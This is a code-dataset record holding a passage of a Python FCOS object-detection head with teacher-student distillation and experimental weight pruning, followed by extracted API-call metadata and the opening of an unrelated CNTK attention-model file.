self.regress_ranges = regress_ranges
self.t_s_ratio = t_s_ratio
self.align_level = align_level
self.training = training
self.eval_student = eval_student
self.learn_when_train = learn_when_train
self.loss_cls = build_loss(loss_cls)
self.loss_bbox = build_loss(loss_bbox)
self.loss_centerness = build_loss(loss_centerness)
self.loss_s_t_cls = build_loss(loss_s_t_cls)
self.loss_s_t_reg=build_loss(loss_s_t_reg)
self.conv_cfg = conv_cfg
self.norm_cfg = norm_cfg
self.fp16_enabled = False
self._init_teacher_layers()
self._init_student_layers()
def _init_teacher_layers(self):
self.cls_convs = nn.ModuleList()
self.reg_convs = nn.ModuleList()
for i in range(self.stacked_convs):
chn = self.in_channels if i == 0 else self.feat_channels
self.cls_convs.append(
ConvModule(
chn,
self.feat_channels,
3,
stride=1,
padding=1,
conv_cfg=self.conv_cfg,
norm_cfg=self.norm_cfg,
bias=self.norm_cfg is None))
self.reg_convs.append(
ConvModule(
chn,
self.feat_channels,
3,
stride=1,
padding=1,
conv_cfg=self.conv_cfg,
norm_cfg=self.norm_cfg,
bias=self.norm_cfg is None))
self.fcos_cls = nn.Conv2d(
self.feat_channels, self.cls_out_channels, 3, padding=1)
self.fcos_reg = nn.Conv2d(self.feat_channels, 4, 3, padding=1)
self.fcos_centerness = nn.Conv2d(self.feat_channels, 1, 3, padding=1)
self.scales = nn.ModuleList([Scale(1.0) for _ in self.strides])
def _init_student_layers(self):
self.s_cls_convs = nn.ModuleList()
self.s_reg_convs = nn.ModuleList()
self.student_feat_channels = int(self.feat_channels / self.t_s_ratio)
for i in range(self.stacked_convs):
chn = self.in_channels if i == 0 else self.student_feat_channels
self.s_cls_convs.append(
ConvModule(
chn,
self.student_feat_channels,
3,
stride=1,
padding=1,
conv_cfg=self.conv_cfg,
norm_cfg=self.norm_cfg,
bias=self.norm_cfg is None))
self.s_reg_convs.append(
ConvModule(
chn,
self.student_feat_channels,
3,
stride=1,
padding=1,
conv_cfg=self.conv_cfg,
norm_cfg=self.norm_cfg,
bias=self.norm_cfg is None))
# Align student feature to teacher
self.t_s_cls_align = nn.Conv2d(
self.student_feat_channels, self.feat_channels, 3, padding=1)
self.t_s_reg_align = nn.Conv2d(
self.student_feat_channels, self.feat_channels, 3, padding=1)
self.fcos_s_cls = nn.Conv2d(
self.student_feat_channels, self.cls_out_channels, 3, padding=1)
self.fcos_s_reg = nn.Conv2d(self.student_feat_channels, 4, 3, padding=1)
self.fcos_s_centerness = nn.Conv2d(self.student_feat_channels, 1, 3, padding=1)
self.scales = nn.ModuleList([Scale(1.0) for _ in self.strides])
def init_weights(self):
for m in self.cls_convs:
normal_init(m.conv, std=0.01)
for m in self.reg_convs:
normal_init(m.conv, std=0.01)
bias_cls = bias_init_with_prob(0.01)
normal_init(self.fcos_cls, std=0.01, bias=bias_cls)
normal_init(self.fcos_reg, std=0.01)
normal_init(self.fcos_centerness, std=0.01)
# student model
for m in self.s_cls_convs:
normal_init(m.conv, std=0.01)
for m in self.s_reg_convs:
normal_init(m.conv, std=0.01)
bias_s_cls = bias_init_with_prob(0.01)
normal_init(self.t_s_cls_align, std=0.01)
normal_init(self.t_s_reg_align, std=0.01)
normal_init(self.fcos_s_cls, std=0.01, bias=bias_s_cls)
normal_init(self.fcos_s_reg, std=0.01)
normal_init(self.fcos_s_centerness, std=0.01)
def forward(self, feats):
return multi_apply(self.forward_single, feats, self.scales)
def forward_single(self, x, scale):
cls_feat = x
reg_feat = x
# only update student head model
s_cls_feat = x.detach()
s_reg_feat = x.detach()
for i in range(len(self.cls_convs)):
cls_layer = self.cls_convs[i]
cls_s_layer = self.s_cls_convs[i]
cls_feat = cls_layer(cls_feat)
s_cls_feat = cls_s_layer(s_cls_feat)
if i == self.align_level:
s_align_cls_feat = s_cls_feat
t_aligned_cls_feat = cls_feat
cls_score = self.fcos_cls(cls_feat)
s_cls_score = self.fcos_s_cls(s_cls_feat)
centerness = self.fcos_centerness(cls_feat)
s_centerness = self.fcos_s_centerness(s_cls_feat)
prune = True
'''
testing: How about prune the teacher feature and weight directly?
'''
if not prune:
for j in range(len(self.reg_convs)):
reg_layer = self.reg_convs[j]
s_reg_layer = self.s_reg_convs[j]
reg_feat = reg_layer(reg_feat)
s_reg_feat = s_reg_layer(s_reg_feat)
if j == self.align_level:
s_align_reg_feat = s_reg_feat
t_aligned_reg_feat = reg_feat
else:
for j in range(len(self.reg_convs)):
reg_layer = self.reg_convs[j]
s_reg_layer = self.s_reg_convs[j]
# prune teacher
origin_weight = reg_layer.conv.weight
# zero_tensor = torch.zeros_like(origin_weight)
# weight_mean = reg_layer.conv.weight.mean(0).expand(256, 256, 3, 3)
# reg_layer.conv.weight.data = torch.where(reg_layer.conv.weight.data > weight_mean, reg_layer.conv.weight.data, zero_tensor)
weight_mask = torch.zeros_like(origin_weight)
weight_mask[:192, ...] = 1
reg_layer.conv.weight.data = origin_weight * weight_mask
reg_feat[:, 192:, ...] = 0
reg_feat = reg_layer(reg_feat)
s_reg_feat = s_reg_layer(s_reg_feat)
if j == self.align_level:
s_align_reg_feat = s_reg_feat
t_aligned_reg_feat = reg_feat
# scale the bbox_pred of different level
# float to avoid overflow when enabling FP16
bbox_pred = scale(self.fcos_reg(reg_feat)).float().exp()
s_bbox_pred = scale(self.fcos_s_reg(s_reg_feat)).float().exp()
# feature align to teacher
s_align_reg_feat = self.t_s_reg_align(s_align_reg_feat)
s_align_cls_feat = self.t_s_cls_align(s_align_cls_feat)
if self.training:
return cls_score, bbox_pred, centerness, s_cls_score, s_bbox_pred, s_centerness, t_aligned_cls_feat, s_align_cls_feat, t_aligned_reg_feat, s_align_reg_feat
else:
if self.eval_student:
return s_cls_score, s_bbox_pred, s_centerness
else:
return cls_score, bbox_pred, centerness
@force_fp32(apply_to=('cls_scores', 'bbox_preds', 'centernesses'))
def loss(self, cls_scores, bbox_preds, centernesses,
s_cls_scores, s_bbox_preds, s_centernesses,
cls_feats, s_cls_feats, reg_feats, s_reg_feats,
gt_bboxes, gt_labels, img_metas, cfg,
gt_bboxes_ignore=None):
loss_cls, loss_bbox, loss_centerness = self.loss_single(cls_scores,
bbox_preds,
centernesses,
gt_bboxes,
gt_labels,
img_metas,
cfg,
gt_bboxes_ignore=None)
s_loss_cls, s_loss_bbox, s_loss_centerness = self.loss_single(s_cls_scores,
s_bbox_preds,
s_centernesses,
gt_bboxes,
gt_labels,
img_metas,
cfg,
gt_bboxes_ignore=None)
flatten_s_cls_feat = [
s_cls_feat.permute(0, 2, 3, 1).reshape(-1, self.student_feat_channels)
for s_cls_feat in s_cls_feats
]
flatten_cls_feat = [
cls_feat.permute(0, 2, 3, 1).reshape(-1, self.student_feat_channels)
for cls_feat in cls_feats
]
flatten_s_reg_feat = [
s_reg_feat.permute(0, 2, 3, 1).reshape(-1, self.student_feat_channels)
for s_reg_feat in s_reg_feats
]
flatten_reg_feat = [
reg_feat.permute(0, 2, 3, 1).reshape(-1, self.student_feat_channels)
for reg_feat in reg_feats
]
flatten_s_cls_feat = torch.cat(flatten_s_cls_feat)
flatten_cls_feat = torch.cat(flatten_cls_feat)
flatten_s_reg_feat = torch.cat(flatten_s_reg_feat)
flatten_reg_feat = torch.cat(flatten_reg_feat)
if self.learn_when_train:
if str(self.loss_s_t_cls) == 'MSELoss()':
loss_s_t_cls = self.loss_s_t_cls(flatten_s_cls_feat, flatten_cls_feat.detach())
loss_s_t_reg = self.loss_s_t_reg(flatten_s_reg_feat, flatten_reg_feat.detach())
elif str(self.loss_s_t_cls) == 'CrossEntropyLoss()':
loss_s_t_cls = self.loss_s_t_cls(flatten_s_cls_feat, flatten_cls_feat.detach().sigmoid())
loss_s_t_reg = self.loss_s_t_reg(flatten_s_reg_feat, flatten_reg_feat.detach().sigmoid())
return dict(
loss_cls=loss_cls,
s_loss_cls=s_loss_cls,
loss_bbox=loss_bbox,
s_loss_bbox=s_loss_bbox,
loss_centerness=loss_centerness,
s_loss_centerness=s_loss_centerness,
loss_s_t_cls=loss_s_t_cls,
loss_s_t_reg=loss_s_t_reg)
else:
return dict(
loss_cls=loss_cls,
s_loss_cls=s_loss_cls,
loss_bbox=loss_bbox,
s_loss_bbox=s_loss_bbox,
loss_centerness=loss_centerness,
s_loss_centerness=s_loss_centerness)
@force_fp32(apply_to=('cls_scores', 'bbox_preds', 'centernesses'))
def loss_single(self,
cls_scores,
bbox_preds,
centernesses,
gt_bboxes,
gt_labels,
img_metas,
cfg,
gt_bboxes_ignore=None):
assert len(cls_scores) == len(bbox_preds) == len(centernesses)
featmap_sizes = [featmap.size()[-2:] for featmap in cls_scores]
all_level_points = self.get_points(featmap_sizes, bbox_preds[0].dtype,
bbox_preds[0].device)
labels, bbox_targets = self.fcos_target(all_level_points, gt_bboxes,
gt_labels)
num_imgs = cls_scores[0].size(0)
# flatten cls_scores, bbox_preds and centerness
flatten_cls_scores = [
cls_score.permute(0, 2, 3, 1).reshape(-1, self.cls_out_channels)
for cls_score in cls_scores
]
flatten_bbox_preds = [
bbox_pred.permute(0, 2, 3, 1).reshape(-1, 4)
for bbox_pred in bbox_preds
]
flatten_centerness = [
centerness.permute(0, 2, 3, 1).reshape(-1)
for centerness in centernesses
]
flatten_cls_scores = torch.cat(flatten_cls_scores)
flatten_bbox_preds = torch.cat(flatten_bbox_preds)
flatten_centerness = torch.cat(flatten_centerness)
flatten_labels = torch.cat(labels)
flatten_bbox_targets = torch.cat(bbox_targets)
# repeat points to align with bbox_preds
flatten_points = torch.cat(
[points.repeat(num_imgs, 1) for points in all_level_points])
pos_inds = flatten_labels.nonzero().reshape(-1)
num_pos = len(pos_inds)
loss_cls = self.loss_cls(
flatten_cls_scores, flatten_labels,
avg_factor=num_pos + num_imgs) # avoid num_pos is 0
pos_bbox_preds = flatten_bbox_preds[pos_inds]
pos_centerness = flatten_centerness[pos_inds]
if num_pos > 0:
pos_bbox_targets = flatten_bbox_targets[pos_inds]
pos_centerness_targets = self.centerness_target(pos_bbox_targets)
pos_points = flatten_points[pos_inds]
pos_decoded_bbox_preds = distance2bbox(pos_points, pos_bbox_preds)
pos_decoded_target_preds = distance2bbox(pos_points,
pos_bbox_targets)
# centerness weighted iou loss
loss_bbox = self.loss_bbox(
pos_decoded_bbox_preds,
pos_decoded_target_preds,
weight=pos_centerness_targets,
avg_factor=pos_centerness_targets.sum())
loss_centerness = self.loss_centerness(pos_centerness,
pos_centerness_targets)
else:
loss_bbox = pos_bbox_preds.sum()
loss_centerness = pos_centerness.sum()
return loss_cls, loss_bbox, loss_centerness
@force_fp32(apply_to=('cls_scores', 'bbox_preds', 'centernesses'))
def get_bboxes(self,
cls_scores,
bbox_preds,
centernesses,
img_metas,
cfg,
rescale=None):
assert len(cls_scores) == len(bbox_preds)
num_levels = len(cls_scores)
featmap_sizes = [featmap.size()[-2:] for featmap in cls_scores]
mlvl_points = self.get_points(featmap_sizes, bbox_preds[0].dtype,
bbox_preds[0].device)
result_list = []
for img_id in range(len(img_metas)):
cls_score_list = [
cls_scores[i][img_id].detach() for i in range(num_levels)
]
bbox_pred_list = [
bbox_preds[i][img_id].detach() for i in range(num_levels)
]
centerness_pred_list = [
centernesses[i][img_id].detach() for i in range(num_levels)
]
img_shape = img_metas[img_id]['img_shape']
scale_factor = img_metas[img_id]['scale_factor']
det_bboxes = self.get_bboxes_single(cls_score_list, bbox_pred_list,
centerness_pred_list,
mlvl_points, img_shape,
scale_factor, cfg, rescale)
result_list.append(det_bboxes)
return result_list
def get_bboxes_single(self,
cls_scores,
bbox_preds,
centernesses,
mlvl_points,
img_shape,
scale_factor,
cfg,
rescale=False):
assert len(cls_scores) == len(bbox_preds) == len(mlvl_points)
mlvl_bboxes = []
mlvl_scores = []
mlvl_centerness = []
for cls_score, bbox_pred, centerness, points in zip(
cls_scores, bbox_preds, centernesses, mlvl_points):
assert cls_score.size()[-2:] == bbox_pred.size()[-2:]
scores = cls_score.permute(1, 2, 0).reshape(
-1, self.cls_out_channels).sigmoid()
centerness = centerness.permute(1, 2, 0).reshape(-1).sigmoid()
bbox_pred = bbox_pred.permute(1, 2, 0).reshape(-1, 4)
nms_pre = cfg.get('nms_pre', -1)
if nms_pre > 0 and scores.shape[0] > nms_pre:
max_scores, _ = (scores * centerness[:, None]).max(dim=1)
_, topk_inds = max_scores.topk(nms_pre)
points = points[topk_inds, :]
bbox_pred = bbox_pred[topk_inds, :]
scores = scores[topk_inds, :]
centerness = centerness[topk_inds]
bboxes = distance2bbox(points, bbox_pred, max_shape=img_shape)
mlvl_bboxes.append(bboxes)
mlvl_scores.append(scores)
mlvl_centerness.append(centerness)
mlvl_bboxes = torch.cat(mlvl_bboxes)
if rescale:
mlvl_bboxes /= mlvl_bboxes.new_tensor(scale_factor)
mlvl_scores = torch.cat(mlvl_scores)
padding = mlvl_scores.new_zeros(mlvl_scores.shape[0], 1)
mlvl_scores = torch.cat([padding, mlvl_scores], dim=1)
mlvl_centerness = torch.cat(mlvl_centerness)
det_bboxes, det_labels = multiclass_nms(
mlvl_bboxes,
mlvl_scores,
cfg.score_thr,
cfg.nms,
cfg.max_per_img,
score_factors=mlvl_centerness)
return det_bboxes, det_labels
def get_points(self, featmap_sizes, dtype, device):
"""Get points according to feature map sizes.
Args:
featmap_sizes (list[tuple]): Multi-level feature map sizes.
dtype (torch.dtype): Type of points.
device (torch.device): Device of points.
Returns:
tuple: points of each image.
"""
mlvl_points = []
for i in range(len(featmap_sizes)):
mlvl_points.append(
self.get_points_single(featmap_sizes[i], self.strides[i],
dtype, device))
return mlvl_points
def get_points_single(self, featmap_size, stride, dtype, device):
h, w = featmap_size
x_range = torch.arange(
0, w * stride, stride, dtype=dtype, device=device)
y_range = torch.arange(
0, h * stride, stride, dtype=dtype, device=device)
y, x = torch.meshgrid(y_range, x_range)
points = torch.stack(
(x.reshape(-1), y.reshape(-1)), dim=-1) + stride // 2
return points
def fcos_target(self, points, gt_bboxes_list, gt_labels_list):
assert len(points) == len(self.regress_ranges)
num_levels = len(points)
# expand regress ranges to align with points
expanded_regress_ranges = [
points[i].new_tensor(self.regress_ranges[i])[None].expand_as(
points[i]) for i in range(num_levels)
]
# concat all levels points and regress ranges
concat_regress_ranges = torch.cat(expanded_regress_ranges, dim=0)
concat_points = torch.cat(points, dim=0)
# get labels and bbox_targets of each image
labels_list, bbox_targets_list = multi_apply(
self.fcos_target_single,
gt_bboxes_list,
gt_labels_list,
points=concat_points,
regress_ranges=concat_regress_ranges)
# split to per img, per level
num_points = [center.size(0) for center in points]
labels_list = [labels.split(num_points, 0) for labels in labels_list]
bbox_targets_list = [
bbox_targets.split(num_points, 0)
for bbox_targets in bbox_targets_list
]
# concat per level image
concat_lvl_labels = []
concat_lvl_bbox_targets = []
for i in range(num_levels):
concat_lvl_labels.append(
torch.cat([labels[i] for labels in labels_list]))
concat_lvl_bbox_targets.append(
torch.cat(
[bbox_targets[i] for bbox_targets in bbox_targets_list]))
return concat_lvl_labels, concat_lvl_bbox_targets
def fcos_target_single(self, gt_bboxes, gt_labels, points, regress_ranges):
num_points = points.size(0)
num_gts = gt_labels.size(0)
if num_gts == 0:
return gt_labels.new_zeros(num_points), \
gt_bboxes.new_zeros((num_points, 4))
areas = (gt_bboxes[:, 2] - gt_bboxes[:, 0] + 1) * (
gt_bboxes[:, 3] - gt_bboxes[:, 1] + 1)
# TODO: figure out why these two are different
# areas = areas[None].expand(num_points, num_gts)
areas = areas[None].repeat(num_points, 1)
regress_ranges = regress_ranges[:, None, :].expand(
num_points, num_gts, 2)
gt_bboxes = gt_bboxes[None].expand(num_points, num_gts, 4)
xs, ys = points[:, 0], points[:, 1]
xs = xs[:, None].expand(num_points, num_gts)
ys = ys[:, None].expand(num_points, num_gts)
left = xs - gt_bboxes[..., 0]
right = gt_bboxes[..., 2] - xs
top = ys - gt_bboxes[..., 1]
bottom = gt_bboxes[..., 3] - ys
bbox_targets = torch.stack((left, top, right, bottom), -1)
# condition1: inside a gt bbox
inside_gt_bbox_mask = bbox_targets.min(-1)[0] > 0
# condition2: limit the regression range for each location
max_regress_distance = bbox_targets.max(-1)[0]
inside_regress_range = (
max_regress_distance >= regress_ranges[..., 0]) & (
max_regress_distance <= regress_ranges[..., 1])
# if there are still more than one objects for a location,
# we choose the one with minimal area
areas[inside_gt_bbox_mask == 0] = INF
areas[inside_regress_range == 0] = INF
min_area, min_area_inds = areas.min(dim=1)
labels = gt_labels[min_area_inds]
labels[min_area == INF] = 0
bbox_targets = bbox_targets[range(num_points), min_area_inds]
return labels, bbox_targets
def centerness_target(self, pos_bbox_targets):
# only calculate pos centerness targets, otherwise there may be nan
left_right = pos_bbox_targets[:, [0, 2]]
top_bottom = pos_bbox_targets[:, [1, 3]]
centerness_targets = (
left_right.min(dim=-1)[0] / left_right.max(dim=-1)[0]) * (
top_bottom.min(dim=-1)[0] / top_bottom.max(dim=-1)[0])
return torch.sqrt(centerness_targets)
|
[
"torch.stack",
"torch.zeros_like",
"torch.nn.ModuleList",
"torch.sqrt",
"torch.nn.Conv2d",
"mmdet.core.force_fp32",
"torch.cat",
"torch.meshgrid",
"mmdet.core.distance2bbox",
"mmcv.cnn.normal_init",
"torch.arange",
"mmdet.core.multiclass_nms",
"mmdet.core.multi_apply"
] |
[((10174, 10239), 'mmdet.core.force_fp32', 'force_fp32', ([], {'apply_to': "('cls_scores', 'bbox_preds', 'centernesses')"}), "(apply_to=('cls_scores', 'bbox_preds', 'centernesses'))\n", (10184, 10239), False, 'from mmdet.core import distance2bbox, force_fp32, multi_apply, multiclass_nms\n'), ((13126, 13191), 'mmdet.core.force_fp32', 'force_fp32', ([], {'apply_to': "('cls_scores', 'bbox_preds', 'centernesses')"}), "(apply_to=('cls_scores', 'bbox_preds', 'centernesses'))\n", (13136, 13191), False, 'from mmdet.core import distance2bbox, force_fp32, multi_apply, multiclass_nms\n'), ((16167, 16232), 'mmdet.core.force_fp32', 'force_fp32', ([], {'apply_to': "('cls_scores', 'bbox_preds', 'centernesses')"}), "(apply_to=('cls_scores', 'bbox_preds', 'centernesses'))\n", (16177, 16232), False, 'from mmdet.core import distance2bbox, force_fp32, multi_apply, multiclass_nms\n'), ((3225, 3240), 'torch.nn.ModuleList', 'nn.ModuleList', ([], {}), '()\n', (3238, 3240), True, 'import torch.nn as nn\n'), ((3266, 3281), 'torch.nn.ModuleList', 'nn.ModuleList', ([], {}), '()\n', (3279, 3281), True, 'import torch.nn as nn\n'), ((4117, 4183), 'torch.nn.Conv2d', 'nn.Conv2d', (['self.feat_channels', 'self.cls_out_channels', '(3)'], {'padding': '(1)'}), '(self.feat_channels, self.cls_out_channels, 3, padding=1)\n', (4126, 4183), True, 'import torch.nn as nn\n'), ((4221, 4267), 'torch.nn.Conv2d', 'nn.Conv2d', (['self.feat_channels', '(4)', '(3)'], {'padding': '(1)'}), '(self.feat_channels, 4, 3, padding=1)\n', (4230, 4267), True, 'import torch.nn as nn\n'), ((4299, 4345), 'torch.nn.Conv2d', 'nn.Conv2d', (['self.feat_channels', '(1)', '(3)'], {'padding': '(1)'}), '(self.feat_channels, 1, 3, padding=1)\n', (4308, 4345), True, 'import torch.nn as nn\n'), ((4487, 4502), 'torch.nn.ModuleList', 'nn.ModuleList', ([], {}), '()\n', (4500, 4502), True, 'import torch.nn as nn\n'), ((4530, 4545), 'torch.nn.ModuleList', 'nn.ModuleList', ([], {}), '()\n', (4543, 4545), True, 'import torch.nn as nn\n'), ((5536, 5607), 'torch.nn.Conv2d', 'nn.Conv2d', (['self.student_feat_channels', 'self.feat_channels', '(3)'], {'padding': '(1)'}), '(self.student_feat_channels, self.feat_channels, 3, padding=1)\n', (5545, 5607), True, 'import torch.nn as nn\n'), ((5650, 5721), 'torch.nn.Conv2d', 'nn.Conv2d', (['self.student_feat_channels', 'self.feat_channels', '(3)'], {'padding': '(1)'}), '(self.student_feat_channels, self.feat_channels, 3, padding=1)\n', (5659, 5721), True, 'import torch.nn as nn\n'), ((5770, 5844), 'torch.nn.Conv2d', 'nn.Conv2d', (['self.student_feat_channels', 'self.cls_out_channels', '(3)'], {'padding': '(1)'}), '(self.student_feat_channels, self.cls_out_channels, 3, padding=1)\n', (5779, 5844), True, 'import torch.nn as nn\n'), ((5884, 5938), 'torch.nn.Conv2d', 'nn.Conv2d', (['self.student_feat_channels', '(4)', '(3)'], {'padding': '(1)'}), '(self.student_feat_channels, 4, 3, padding=1)\n', (5893, 5938), True, 'import torch.nn as nn\n'), ((5972, 6026), 'torch.nn.Conv2d', 'nn.Conv2d', (['self.student_feat_channels', '(1)', '(3)'], {'padding': '(1)'}), '(self.student_feat_channels, 1, 3, padding=1)\n', (5981, 6026), True, 'import torch.nn as nn\n'), ((6332, 6383), 'mmcv.cnn.normal_init', 'normal_init', (['self.fcos_cls'], {'std': '(0.01)', 'bias': 'bias_cls'}), '(self.fcos_cls, std=0.01, bias=bias_cls)\n', (6343, 6383), False, 'from mmcv.cnn import normal_init\n'), ((6392, 6428), 'mmcv.cnn.normal_init', 'normal_init', (['self.fcos_reg'], {'std': '(0.01)'}), '(self.fcos_reg, std=0.01)\n', (6403, 6428), False, 'from mmcv.cnn import normal_init\n'), ((6437, 6480), 'mmcv.cnn.normal_init', 'normal_init', (['self.fcos_centerness'], {'std': '(0.01)'}), '(self.fcos_centerness, std=0.01)\n', (6448, 6480), False, 'from mmcv.cnn import normal_init\n'), ((6714, 6755), 'mmcv.cnn.normal_init', 'normal_init', (['self.t_s_cls_align'], {'std': '(0.01)'}), '(self.t_s_cls_align, std=0.01)\n', (6725, 6755), False, 'from mmcv.cnn import normal_init\n'), ((6764, 6805), 'mmcv.cnn.normal_init', 'normal_init', (['self.t_s_reg_align'], {'std': '(0.01)'}), '(self.t_s_reg_align, std=0.01)\n', (6775, 6805), False, 'from mmcv.cnn import normal_init\n'), ((6814, 6869), 'mmcv.cnn.normal_init', 'normal_init', (['self.fcos_s_cls'], {'std': '(0.01)', 'bias': 'bias_s_cls'}), '(self.fcos_s_cls, std=0.01, bias=bias_s_cls)\n', (6825, 6869), False, 'from mmcv.cnn import normal_init\n'), ((6878, 6916), 'mmcv.cnn.normal_init', 'normal_init', (['self.fcos_s_reg'], {'std': '(0.01)'}), '(self.fcos_s_reg, std=0.01)\n', (6889, 6916), False, 'from mmcv.cnn import normal_init\n'), ((6925, 6970), 'mmcv.cnn.normal_init', 'normal_init', (['self.fcos_s_centerness'], {'std': '(0.01)'}), '(self.fcos_s_centerness, std=0.01)\n', (6936, 6970), False, 'from mmcv.cnn import normal_init\n'), ((7017, 7069), 'mmdet.core.multi_apply', 'multi_apply', (['self.forward_single', 'feats', 'self.scales'], {}), '(self.forward_single, feats, self.scales)\n', (7028, 7069), False, 'from mmdet.core import distance2bbox, force_fp32, multi_apply, multiclass_nms\n'), ((11697, 11726), 'torch.cat', 'torch.cat', (['flatten_s_cls_feat'], {}), '(flatten_s_cls_feat)\n', (11706, 11726), False, 'import torch\n'), ((11754, 11781), 'torch.cat', 'torch.cat', (['flatten_cls_feat'], {}), '(flatten_cls_feat)\n', (11763, 11781), False, 'import torch\n'), ((11811, 11840), 'torch.cat', 'torch.cat', (['flatten_s_reg_feat'], {}), '(flatten_s_reg_feat)\n', (11820, 11840), False, 'import torch\n'), ((11868, 11895), 'torch.cat', 'torch.cat', (['flatten_reg_feat'], {}), '(flatten_reg_feat)\n', (11877, 11895), False, 'import torch\n'), ((14407, 14436), 'torch.cat', 'torch.cat', (['flatten_cls_scores'], {}), '(flatten_cls_scores)\n', (14416, 14436), False, 'import torch\n'), ((14466, 14495), 'torch.cat', 'torch.cat', (['flatten_bbox_preds'], {}), '(flatten_bbox_preds)\n', (14475, 14495), False, 'import torch\n'), ((14525, 14554), 'torch.cat', 'torch.cat', (['flatten_centerness'], {}), '(flatten_centerness)\n', (14534, 14554), False, 'import torch\n'), ((14580, 14597), 'torch.cat', 'torch.cat', (['labels'], {}), '(labels)\n', (14589, 14597), False, 'import torch\n'), ((14629, 14652), 'torch.cat', 'torch.cat', (['bbox_targets'], {}), '(bbox_targets)\n', (14638, 14652), False, 'import torch\n'), ((19238, 19260), 'torch.cat', 'torch.cat', (['mlvl_bboxes'], {}), '(mlvl_bboxes)\n', (19247, 19260), False, 'import torch\n'), ((19367, 19389), 'torch.cat', 'torch.cat', (['mlvl_scores'], {}), '(mlvl_scores)\n', (19376, 19389), False, 'import torch\n'), ((19477, 19517), 'torch.cat', 'torch.cat', (['[padding, mlvl_scores]'], {'dim': '(1)'}), '([padding, mlvl_scores], dim=1)\n', (19486, 19517), False, 'import torch\n'), ((19544, 19570), 'torch.cat', 'torch.cat', (['mlvl_centerness'], {}), '(mlvl_centerness)\n', (19553, 19570), False, 'import torch\n'), ((19604, 19721), 'mmdet.core.multiclass_nms', 'multiclass_nms', (['mlvl_bboxes', 'mlvl_scores', 'cfg.score_thr', 'cfg.nms', 'cfg.max_per_img'], {'score_factors': 'mlvl_centerness'}), '(mlvl_bboxes, mlvl_scores, cfg.score_thr, cfg.nms, cfg.\n max_per_img, score_factors=mlvl_centerness)\n', (19618, 19721), False, 'from mmdet.core import distance2bbox, force_fp32, multi_apply, multiclass_nms\n'), ((20573, 20636), 'torch.arange', 'torch.arange', (['(0)', '(w * stride)', 'stride'], {'dtype': 'dtype', 'device': 'device'}), '(0, w * stride, stride, dtype=dtype, device=device)\n', (20585, 20636), False, 'import torch\n'), ((20668, 20731), 'torch.arange', 'torch.arange', (['(0)', '(h * stride)', 'stride'], {'dtype': 'dtype', 'device': 'device'}), '(0, h * stride, stride, dtype=dtype, device=device)\n', (20680, 20731), False, 'import torch\n'), ((20760, 20792), 'torch.meshgrid', 'torch.meshgrid', (['y_range', 'x_range'], {}), '(y_range, x_range)\n', (20774, 20792), False, 'import torch\n'), ((21380, 21421), 'torch.cat', 'torch.cat', (['expanded_regress_ranges'], {'dim': '(0)'}), '(expanded_regress_ranges, dim=0)\n', (21389, 21421), False, 'import torch\n'), ((21446, 21470), 'torch.cat', 'torch.cat', (['points'], {'dim': '(0)'}), '(points, dim=0)\n', (21455, 21470), False, 'import torch\n'), ((21564, 21697), 'mmdet.core.multi_apply', 'multi_apply', (['self.fcos_target_single', 'gt_bboxes_list', 'gt_labels_list'], {'points': 'concat_points', 'regress_ranges': 'concat_regress_ranges'}), '(self.fcos_target_single, gt_bboxes_list, gt_labels_list, points\n =concat_points, regress_ranges=concat_regress_ranges)\n', (21575, 21697), False, 'from mmdet.core import distance2bbox, force_fp32, multi_apply, multiclass_nms\n'), ((23569, 23612), 'torch.stack', 'torch.stack', (['(left, top, right, bottom)', '(-1)'], {}), '((left, top, right, bottom), -1)\n', (23580, 23612), False, 'import torch\n'), ((24852, 24882), 'torch.sqrt', 'torch.sqrt', (['centerness_targets'], {}), '(centerness_targets)\n', (24862, 24882), False, 'import torch\n'), ((6174, 6203), 'mmcv.cnn.normal_init', 'normal_init', (['m.conv'], {'std': '(0.01)'}), '(m.conv, std=0.01)\n', (6185, 6203), False, 'from mmcv.cnn import normal_init\n'), ((6249, 6278), 'mmcv.cnn.normal_init', 'normal_init', (['m.conv'], {'std': '(0.01)'}), '(m.conv, std=0.01)\n', (6260, 6278), False, 'from mmcv.cnn import normal_init\n'), ((6552, 6581), 'mmcv.cnn.normal_init', 'normal_init', (['m.conv'], {'std': '(0.01)'}), '(m.conv, std=0.01)\n', (6563, 6581), False, 'from mmcv.cnn import normal_init\n'), ((6629, 6658), 'mmcv.cnn.normal_init', 'normal_init', (['m.conv'], {'std': '(0.01)'}), '(m.conv, std=0.01)\n', (6640, 6658), False, 'from mmcv.cnn import normal_init\n'), ((15408, 15449), 'mmdet.core.distance2bbox', 'distance2bbox', (['pos_points', 'pos_bbox_preds'], {}), '(pos_points, pos_bbox_preds)\n', (15421, 15449), False, 'from mmdet.core import distance2bbox, force_fp32, multi_apply, multiclass_nms\n'), ((15489, 15532), 'mmdet.core.distance2bbox', 'distance2bbox', (['pos_points', 'pos_bbox_targets'], {}), '(pos_points, pos_bbox_targets)\n', (15502, 15532), False, 'from mmdet.core import distance2bbox, force_fp32, multi_apply, multiclass_nms\n'), ((19037, 19090), 'mmdet.core.distance2bbox', 'distance2bbox', (['points', 'bbox_pred'], {'max_shape': 'img_shape'}), '(points, bbox_pred, max_shape=img_shape)\n', (19050, 19090), False, 'from mmdet.core import distance2bbox, force_fp32, multi_apply, multiclass_nms\n'), ((8942, 8973), 'torch.zeros_like', 'torch.zeros_like', (['origin_weight'], {}), '(origin_weight)\n', (8958, 8973), False, 'import torch\n'), ((22258, 22306), 'torch.cat', 'torch.cat', (['[labels[i] for labels in labels_list]'], {}), '([labels[i] for labels in labels_list])\n', (22267, 22306), False, 'import torch\n'), ((22368, 22434), 'torch.cat', 'torch.cat', (['[bbox_targets[i] for bbox_targets in bbox_targets_list]'], {}), '([bbox_targets[i] for bbox_targets in bbox_targets_list])\n', (22377, 22434), False, 'import torch\n')]
|
# ==============================================================================
# Copyright (c) Microsoft. All rights reserved.
# Licensed under the MIT license. See LICENSE.md file in the project root
# for full license information.
# ==============================================================================
'''
Standard attention model.
'''
from __future__ import division
import cntk as C
from cntk.ops.functions import Function
from cntk.default_options import default_options, get_default_override, default_override_or
from cntk.initializer import glorot_uniform
from ..layers import Dense, Label
from ..blocks import Stabilizer, _inject_name # helpers
from ..sequence import PastValueWindow
#from .. import *
# AttentionModel block
def AttentionModel(attention_dim, attention_span=None, attention_axis=None,
init=default_override_or(glorot_uniform()),
go_backwards=default_override_or(False),
enable_self_stabilization=default_override_or(True), name=''):
'''
AttentionModel(attention_dim, attention_span=None, attention_axis=None, init=glorot_uniform(), go_backwards=False, enable_self_stabilization=True, name='')
Layer factory function to create a function object that implements an attention model
as described in Bahdanau, et al., "Neural machine translation by jointly learning to align and translate."
'''
